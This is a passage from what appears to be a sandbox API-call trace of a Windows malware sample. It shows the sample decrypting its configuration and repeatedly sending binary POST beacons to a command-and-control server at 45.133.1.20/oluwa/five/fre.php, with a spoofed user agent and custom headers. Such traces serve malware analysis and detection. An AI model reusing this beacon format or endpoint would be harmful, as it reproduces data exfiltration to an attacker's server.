lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0190.183] GetProcessHeap () returned 0x6a0000 [0190.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.184] GetProcessHeap () returned 0x6a0000 [0190.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0190.185] GetProcessHeap () returned 0x6a0000 [0190.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1204) returned 0x480 [0190.187] Sleep (dwMilliseconds=0xea60) [0190.189] GetProcessHeap () returned 0x6a0000 [0190.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0190.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0190.211] GetProcessHeap () returned 0x6a0000 [0190.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.213] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.227] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.228] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.228] GetProcessHeap () returned 0x6a0000 [0190.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.230] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0190.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.232] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.233] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0190.234] GetProcessHeap () returned 0x6a0000 [0190.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.238] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.240] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.241] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.244] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.244] GetProcessHeap () returned 0x6a0000 [0190.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0190.244] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.244] GetProcessHeap () returned 0x6a0000 [0190.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0190.245] GetProcessHeap () returned 0x6a0000 [0190.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.245] GetProcessHeap () returned 0x6a0000 [0190.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0190.246] GetProcessHeap () returned 0x6a0000 [0190.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0190.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.247] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0190.270] GetProcessHeap () returned 0x6a0000 [0190.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.271] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.273] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.274] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.274] GetProcessHeap () returned 0x6a0000 [0190.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.275] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0190.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.276] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.277] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0190.277] GetProcessHeap () returned 0x6a0000 [0190.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.278] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0190.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0190.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.283] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0190.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.284] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0190.284] GetProcessHeap () returned 0x6a0000 [0190.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.284] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0190.284] GetProcessHeap () returned 0x6a0000 [0190.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0190.285] socket (af=2, type=1, protocol=6) returned 0x484 [0190.285] connect (s=0x484, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0190.314] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0190.314] GetProcessHeap () returned 0x6a0000 [0190.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0190.314] GetProcessHeap () returned 0x6a0000 [0190.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0190.315] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.316] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.316] GetProcessHeap () returned 0x6a0000 [0190.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0190.316] GetProcessHeap () returned 0x6a0000 [0190.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.317] GetProcessHeap () returned 0x6a0000 [0190.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0190.319] GetProcessHeap () returned 0x6a0000 [0190.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0190.319] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.320] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.320] GetProcessHeap () returned 0x6a0000 [0190.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0190.321] GetProcessHeap () returned 0x6a0000 [0190.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.321] send (s=0x484, buf=0x6b5c98*, len=242, flags=0) returned 242 [0190.322] send (s=0x484, buf=0x6bb998*, len=159, flags=0) returned 159 [0190.322] GetProcessHeap () returned 0x6a0000 [0190.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0190.325] recv (in: s=0x484, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0190.407] GetProcessHeap () returned 0x6a0000 [0190.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0190.408] GetProcessHeap () returned 0x6a0000 [0190.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0190.408] GetProcessHeap () returned 0x6a0000 [0190.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0190.409] GetProcessHeap () returned 0x6a0000 [0190.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0190.410] closesocket (s=0x484) returned 0 [0190.410] GetProcessHeap () returned 0x6a0000 [0190.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0190.410] GetProcessHeap () returned 0x6a0000 [0190.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.411] GetProcessHeap () returned 0x6a0000 [0190.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0190.411] GetProcessHeap () returned 0x6a0000 [0190.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1208) returned 0x484 [0190.413] Sleep (dwMilliseconds=0xea60) [0190.415] GetProcessHeap () returned 0x6a0000 [0190.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0190.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0190.431] GetProcessHeap () returned 0x6a0000 [0190.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfd28 [0190.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.432] CryptImportKey (in: hProv=0x6bef48, pbData=0x6bfd28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0190.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.436] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.437] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.437] GetProcessHeap () returned 0x6a0000 [0190.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfd28 | out: hHeap=0x6a0000) returned 1 [0190.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.438] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0190.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.439] CryptDestroyKey (hKey=0x6ad520) returned 1 [0190.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.440] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0190.440] GetProcessHeap () returned 0x6a0000 [0190.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.446] GetProcessHeap () returned 0x6a0000 [0190.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.446] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.447] GetProcessHeap () returned 0x6a0000 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.447] GetProcessHeap () returned 0x6a0000 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.447] GetProcessHeap () returned 0x6a0000 [0190.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0190.447] GetProcessHeap () returned 0x6a0000 [0190.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0190.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.452] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0190.464] GetProcessHeap () returned 0x6a0000 [0190.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.465] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0190.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.468] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.469] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.469] GetProcessHeap () returned 0x6a0000 [0190.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.471] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0190.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.472] CryptDestroyKey (hKey=0x6ad020) returned 1 [0190.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.473] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0190.474] GetProcessHeap () returned 0x6a0000 [0190.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.474] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0190.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.476] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0190.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.479] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0190.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.480] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0190.480] GetProcessHeap () returned 0x6a0000 [0190.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.480] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0190.480] GetProcessHeap () returned 0x6a0000 [0190.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0190.480] socket (af=2, type=1, protocol=6) returned 0x488 [0190.481] connect (s=0x488, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0190.508] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0190.508] GetProcessHeap () returned 0x6a0000 [0190.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0190.509] GetProcessHeap () returned 0x6a0000 [0190.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0190.511] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.513] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.513] GetProcessHeap () returned 0x6a0000 [0190.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0190.513] GetProcessHeap () returned 0x6a0000 [0190.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.514] GetProcessHeap () returned 0x6a0000 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0190.515] GetProcessHeap () returned 0x6a0000 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0190.516] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.517] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.517] GetProcessHeap () returned 0x6a0000 [0190.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0190.517] GetProcessHeap () returned 0x6a0000 [0190.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.518] send (s=0x488, buf=0x6b5c98*, len=242, flags=0) returned 242 [0190.519] send (s=0x488, buf=0x6bb998*, len=159, flags=0) returned 159 [0190.519] GetProcessHeap () returned 0x6a0000 [0190.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0190.519] recv (in: s=0x488, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0190.591] GetProcessHeap () returned 0x6a0000 [0190.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0190.592] GetProcessHeap () returned 0x6a0000 [0190.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0190.593] GetProcessHeap () returned 0x6a0000 [0190.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0190.596] GetProcessHeap () returned 0x6a0000 [0190.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0190.596] closesocket (s=0x488) returned 0 [0190.597] GetProcessHeap () returned 0x6a0000 [0190.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0190.597] GetProcessHeap () returned 0x6a0000 [0190.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.598] GetProcessHeap () returned 0x6a0000 [0190.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0190.599] GetProcessHeap () returned 0x6a0000 [0190.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x120c) returned 0x488 [0190.601] Sleep (dwMilliseconds=0xea60) [0190.602] GetProcessHeap () returned 0x6a0000 [0190.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 